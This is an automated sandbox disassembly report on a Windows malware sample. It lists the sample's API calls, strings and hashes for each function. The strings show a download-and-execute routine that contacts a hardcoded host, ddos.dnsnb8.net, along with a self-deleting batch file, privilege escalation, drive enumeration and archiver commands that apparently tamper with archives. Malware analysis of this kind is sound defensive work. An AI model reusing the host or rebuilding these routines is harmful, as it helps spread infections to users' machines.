Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HGn$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-1288325825
Opcode ID: af4d0f14adca51f990610a154e152bf8afece3c8ca05f997fb5a07bc6136445e
Instruction ID: c9c521aed48d16c4471ac1abed652f998af94419a9fe152e54ec7a7de35daff7
Opcode Fuzzy Hash: af4d0f14adca51f990610a154e152bf8afece3c8ca05f997fb5a07bc6136445e
Instruction Fuzzy Hash: 8521A1719023D8BBCB20DBA1DC88BEEBBBFAB16315F110099E100AB151DB745B85DF60

Function 006E1581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006E185B: GetSystemTimeAsFileTime.KERNEL32(006E1F92,00000000,?,00000000,?,?,?,006E1F92,?,00000000,00000002), ref: 006E1867
Part of subcall function 006E185B: srand.MSVCRT ref: 006E1878
Part of subcall function 006E185B: rand.MSVCRT ref: 006E1880
Part of subcall function 006E185B: srand.MSVCRT ref: 006E1890
Part of subcall function 006E185B: rand.MSVCRT ref: 006E1894

wsprintfA.USER32 ref: 006E15AA
wsprintfA.USER32 ref: 006E15C6
lstrlen.KERNEL32(?), ref: 006E15D2
CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 006E15EE
WriteFile.KERNELBASE(00000000,?,00000000,00000001,00000000), ref: 006E1609
CloseHandle.KERNEL32(00000000), ref: 006E1612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 006E162D

Strings

open, xrefs: 006E1627
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 006E15C0
C:\Users\user\AppData\Local\Temp\, xrefs: 006E1599
C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 006E158A, 006E15B3, 006E15B8, 006E15B9
%s%.8x.bat, xrefs: 006E15A4

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XBVdJN.exe$open
API String ID: 617340118-2664338557
Opcode ID: 245534e39cbe17c7e75e52796fd3b6c6eb2036d596585d43d9fe3024faa2f8da
Instruction ID: dc6cecf4b399184c7b21ad5e48cf7daca3035de79ed04eb79f91e5257aa8882a
Opcode Fuzzy Hash: 245534e39cbe17c7e75e52796fd3b6c6eb2036d596585d43d9fe3024faa2f8da
Instruction Fuzzy Hash: 00117372A02378BBD72097A59C8DDEB7B6DDF5A760F000095F549E7240DA709F898BB0

Function 006E1638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 006E164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 006E165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\XBVdJN.exe,00000104), ref: 006E166E
CreateThread.KERNELBASE(00000000,00000000,006E1099,00000000,00000000,00000000), ref: 006E16AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 006E16BD

Part of subcall function 006E139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006E13BC
Part of subcall function 006E139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006E13DA
Part of subcall function 006E139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 006E1448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006E16E5

Strings

Documents and Settings, xrefs: 006E1696
C:\Windows\system32, xrefs: 006E1656
C:\Users\user\AppData\Local\Temp\, xrefs: 006E1644
C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 006E1662, 006E1667, 006E16DD

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XBVdJN.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-1332623409
Opcode ID: e1bd1cac9f22b145ce856a07f12c6cd0cabbfc3031f9272221c7f1318b9ef10d
Instruction ID: 2759e8090f50f7dc0521f4d82d9c02ad28d3aa1069a68cda5bd03452d4d89042
Opcode Fuzzy Hash: e1bd1cac9f22b145ce856a07f12c6cd0cabbfc3031f9272221c7f1318b9ef10d
Instruction Fuzzy Hash: 9D11B4715023E47BCF206BA69D8DEDB3E6FEB46761F001015F2099E2A0DA718640DBA1

Function 006E1000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGn,http://%s:%d/%s/%s,006E10E8,?), ref: 006E1018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76938400), ref: 006E1029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 006E1038
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000), ref: 006E104B
UnmapViewOfFile.KERNEL32(00000000), ref: 006E1075
CloseHandle.KERNEL32(?), ref: 006E108B
CloseHandle.KERNEL32(00000000), ref: 006E108E

Strings

http://%s:%d/%s/%s, xrefs: 006E1000
ddos.dnsnb8.net, xrefs: 006E1026
HGn, xrefs: 006E1001

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: HGn$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-4110687402
Opcode ID: 1536993e770b02ab432a93e1e205656cd13da3a2be67887ad9ec11395a0dc86e
Instruction ID: 8e87a23f975232919a2943931d55259ac0e408266c92d472ce16f66632906127
Opcode Fuzzy Hash: 1536993e770b02ab432a93e1e205656cd13da3a2be67887ad9ec11395a0dc86e
Instruction Fuzzy Hash: 6701847110039CBFE7306F619CCCE6BBBAEEB457A9F004529F245AB290DA705E449B60

Function 006E2B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 006E2BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 006E2BB4
GetDriveTypeA.KERNELBASE(?), ref: 006E2BD3
CreateThread.KERNELBASE(00000000,00000000,006E2B7D,?,00000000,00000000), ref: 006E2BEE
lstrlen.KERNEL32(?), ref: 006E2BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 006E2C16
CreateThread.KERNELBASE(00000000,00000000,006E2845,00000000,00000000,00000000), ref: 006E2C3A

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: 507c096f6f2877c258ec2dd512cf6b9da08de9f376c4fd6054f888b75cd5c1f8
Instruction ID: 2e7b40b2caba5f64250181656bf63a49f8aa7d0d1aeffd94e66ec459aabcfcac
Opcode Fuzzy Hash: 507c096f6f2877c258ec2dd512cf6b9da08de9f376c4fd6054f888b75cd5c1f8
Instruction Fuzzy Hash: 5E21D2B18013DEAFE7209F65AC88DEF7B6FFB04348B250129F84297251D7248E06CB61

Function 006E2C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 006E2C57

Part of subcall function 006E1973: PathFileExistsA.KERNELBASE(\Nn`Nn,00000000,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006E1992
Part of subcall function 006E1973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006E19BA
Part of subcall function 006E1973: Sleep.KERNEL32(00000064), ref: 006E19C6
Part of subcall function 006E1973: wsprintfA.USER32 ref: 006E19EC
Part of subcall function 006E1973: CopyFileA.KERNEL32(?,?,00000000), ref: 006E1A00
Part of subcall function 006E1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006E1A1E
Part of subcall function 006E1973: GetFileSize.KERNEL32(?,00000000), ref: 006E1A2C
Part of subcall function 006E1973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 006E1A46
Part of subcall function 006E1973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 006E1A65

CreateThread.KERNELBASE(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 006E2C99
WaitForMultipleObjects.KERNEL32(00000001,006E16BA,00000001,000000FF,?,006E16BA,00000000), ref: 006E2CAC
VirtualFree.KERNELBASE(007D0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\XBVdJN.exe,006E4E5C,006E4E60,?,006E16BA,00000000), ref: 006E2CC2

Strings

C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 006E2C69

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe
API String ID: 2042498389-1113178309
Opcode ID: 433a3d03b4f3ac87210dd5a93bcc6b99eb867cbacb3595ba52ad126aba0de6a0
Instruction ID: 462c681ca6899bcf8cbbe150f9966aa22dce097a4f47245102fc589656590d16
Opcode Fuzzy Hash: 433a3d03b4f3ac87210dd5a93bcc6b99eb867cbacb3595ba52ad126aba0de6a0
Instruction Fuzzy Hash: 7201BC716423A07AD750ABA6DC5EEAB7E6FEF01B20F104014B6049A2C1DAA09A00C7A0

Function 006E2845 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006E274A: memset.MSVCRT ref: 006E2766
Part of subcall function 006E274A: memset.MSVCRT ref: 006E2774
Part of subcall function 006E274A: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 006E2787
Part of subcall function 006E274A: wsprintfA.USER32 ref: 006E27AB
Part of subcall function 006E274A: wsprintfA.USER32 ref: 006E27C6
Part of subcall function 006E274A: CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\4e06417b.exe,00000000), ref: 006E27D4
Part of subcall function 006E274A: wsprintfA.USER32 ref: 006E27F4
Part of subcall function 006E274A: DeleteFileA.KERNEL32(?,?,006E4E54,006E4E58), ref: 006E281A
Part of subcall function 006E274A: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,006E4E54,006E4E58), ref: 006E2832

DeleteFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\4e06417b.exe), ref: 006E287D
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006E2894
CloseHandle.KERNEL32(FFFFFFFF), ref: 006E28A5

Part of subcall function 006E2692: CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7622E800,?,?,006E29DB,?,00000001), ref: 006E26A7
Part of subcall function 006E2692: WaitForSingleObject.KERNEL32(00000000,000000FF,7622E800,?,?,006E29DB,?,00000001), ref: 006E26B5
Part of subcall function 006E2692: lstrlen.KERNEL32(?), ref: 006E26C4
Part of subcall function 006E2692: ??2@YAPAXI@Z.MSVCRT ref: 006E26CE
Part of subcall function 006E2692: lstrcpy.KERNEL32(00000004,?), ref: 006E26E3
Part of subcall function 006E2692: SetEvent.KERNEL32 ref: 006E273C

Strings

C:\Users\user\AppData\Local\Temp\4e06417b.exe, xrefs: 006E2878

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: File$wsprintf$CreateDeleteEventmemset$??2@CloseCopyFolderFreeHandleObjectPathSingleSpecialVirtualWaitlstrcpylstrlen
String ID: C:\Users\user\AppData\Local\Temp\4e06417b.exe
API String ID: 2533558932-1875479923
Opcode ID: e7bf5ba0018e41b402e06b6c53c2271bae5da4634f7704821c4a989f06cb5c79
Instruction ID: 8bfe537c4bb3ba04651ba8f8f398c5cb15b878688c928b519343d346542267fa
Opcode Fuzzy Hash: e7bf5ba0018e41b402e06b6c53c2271bae5da4634f7704821c4a989f06cb5c79
Instruction Fuzzy Hash: 11F0B47024138557D720A776ACEEB9A335F7B10701F000560B606D72D0DFB8D5598A15

Function 006E14E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 006E1504
VirtualQuery.KERNEL32(006E14E1,?,0000001C), ref: 006E1525
ExitProcess.KERNEL32 ref: 006E157A

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 1280f4f9d0ddf6257519c4b8f03a7aa9521635bcabdc2e97795cb138e62fce17
Instruction ID: 052eb43a426c83961203232d48c998c62e5bc93a4197c9346312b3858a744675
Opcode Fuzzy Hash: 1280f4f9d0ddf6257519c4b8f03a7aa9521635bcabdc2e97795cb138e62fce17
Instruction Fuzzy Hash: CC1130B1D02394DFCB21DFB6ACC56BD77BEEB89711B10602AF402DF250D6748941AB51

Function 006E615C Relevance: 2.6, APIs: 2, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 006E60DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 006E6189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 006E61A5

Memory Dump Source

Source File: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: d92d740ba11deb94a2c7500458ce6e319d6ffe51d00f4c7b61ef977ea1037f13
Instruction ID: d771b826bd1c6ce39bb4e3fa559eaae5493c4a3721e71acf9027888b8e129caf
Opcode Fuzzy Hash: d92d740ba11deb94a2c7500458ce6e319d6ffe51d00f4c7b61ef977ea1037f13
Instruction Fuzzy Hash: BD118B31601689CFCF318F59CC853DD37A2FF64340F684018EE8A5B381DA716A41CB84

Non-executed Functions

Function 006E119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,?,?,006E13EF), ref: 006E11AB
OpenProcessToken.ADVAPI32(00000000,00000028,006E13EF,?,?,?,?,?,?,006E13EF), ref: 006E11BB
AdjustTokenPrivileges.ADVAPI32(006E13EF,00000000,?,00000010,00000000,00000000), ref: 006E11EB
CloseHandle.KERNEL32(006E13EF), ref: 006E11FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,006E13EF), ref: 006E1203

Strings

C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 006E11A5

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe
API String ID: 75692138-1113178309
Opcode ID: c3d2136220db48a6a44f653af362de75ebd345279e04ed467ef18053d5ec4dff
Instruction ID: ed32191ead48e66b365414919318aeca91303c81eed0d282959c273ee1ae8944
Opcode Fuzzy Hash: c3d2136220db48a6a44f653af362de75ebd345279e04ed467ef18053d5ec4dff
Instruction Fuzzy Hash: 550124B1900348FFDB10DFE4DD89AAEBBBAFB08304F204469E606AA250D7709F449F50

Function 006E239D Relevance: 58.0, APIs: 26, Strings: 7, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 006E23CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006E2464
GetFileSize.KERNEL32(00000000,00000000), ref: 006E2472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 006E24A8
memset.MSVCRT ref: 006E24B9
strrchr.MSVCRT ref: 006E24C9
wsprintfA.USER32 ref: 006E24DE
strrchr.MSVCRT ref: 006E24ED
memset.MSVCRT ref: 006E24F2
memset.MSVCRT ref: 006E2505
wsprintfA.USER32 ref: 006E2524
Sleep.KERNEL32(000007D0), ref: 006E2535
Sleep.KERNEL32(000007D0), ref: 006E255D
memset.MSVCRT ref: 006E256E
wsprintfA.USER32 ref: 006E2585
memset.MSVCRT ref: 006E25A6
wsprintfA.USER32 ref: 006E25CA
Sleep.KERNEL32(000007D0), ref: 006E25D0
Sleep.KERNEL32(000007D0,?,?), ref: 006E25E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006E25FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 006E2611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 006E2642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 006E265B
SetEndOfFile.KERNEL32 ref: 006E266D
CloseHandle.KERNEL32(00000000), ref: 006E2676
RemoveDirectoryA.KERNEL32(?), ref: 006E2681

Strings

C:\Users\user\AppData\Local\Temp\4e06417b.exe, xrefs: 006E2519, 006E25BF
%s\, xrefs: 006E257F
-ibck, xrefs: 006E25BA
C:\Users\user\AppData\Local\Temp\, xrefs: 006E23B1, 006E23B6, 006E24CD
%s%s, xrefs: 006E24D8
%s X -ibck "%s" "%s\", xrefs: 006E251E
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 006E25C4

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\4e06417b.exe
API String ID: 2203340711-1098072299
Opcode ID: 8d14eacc46f31690d06d38e42d60e7183782c6115c238e6ffcb6ad2eaeca2d85
Instruction ID: b2bccdc4ad89657929fc7c8b8f3903b907aaa7ef883b28156a663fd4c2ee5006
Opcode Fuzzy Hash: 8d14eacc46f31690d06d38e42d60e7183782c6115c238e6ffcb6ad2eaeca2d85
Instruction Fuzzy Hash: 5D81CFB1505385BBD710DF62DC89EABB7EFFB88704F00091AF684D7290D7709A498B66

Function 006E120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,006E1400), ref: 006E1226
GetProcAddress.KERNEL32(00000000), ref: 006E122D
GetCurrentProcessId.KERNEL32(?,?,?,?,006E1400), ref: 006E123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,006E1400), ref: 006E1250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,006E1400), ref: 006E129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,006E1400), ref: 006E12B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,006E1400), ref: 006E12F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,006E1400), ref: 006E130A

Strings

ZwQuerySystemInformation, xrefs: 006E1212
C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 006E1262
ntdll.dll, xrefs: 006E1219

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-2647507469
Opcode ID: e501f9d7abdd0cd0c6194276a3f0bc0e201d3b53e3d345cbcbb1f35c849f7348
Instruction ID: 77778b2b88127630a156640c594566fc928249432e005b6afcb68a738e71a26c
Opcode Fuzzy Hash: e501f9d7abdd0cd0c6194276a3f0bc0e201d3b53e3d345cbcbb1f35c849f7348
Instruction Fuzzy Hash: 6D21FC31606391AFD7209B56DC48BAF7A9AFB46B00F100918F645DF380C770DB84D795

Function 006E189D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 006E18B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,76230F00,76938400), ref: 006E18D3
CloseHandle.KERNEL32(I%n), ref: 006E18E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 006E18F0
GetExitCodeProcess.KERNEL32(?,?), ref: 006E1901
CloseHandle.KERNEL32(?), ref: 006E190A

Strings

I%n, xrefs: 006E18E0

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID: I%n
API String ID: 876959470-3270767589
Opcode ID: 861147a20537297b13c17c18e3f2a5abab140c8ecad6b68387f59e54b0110f68
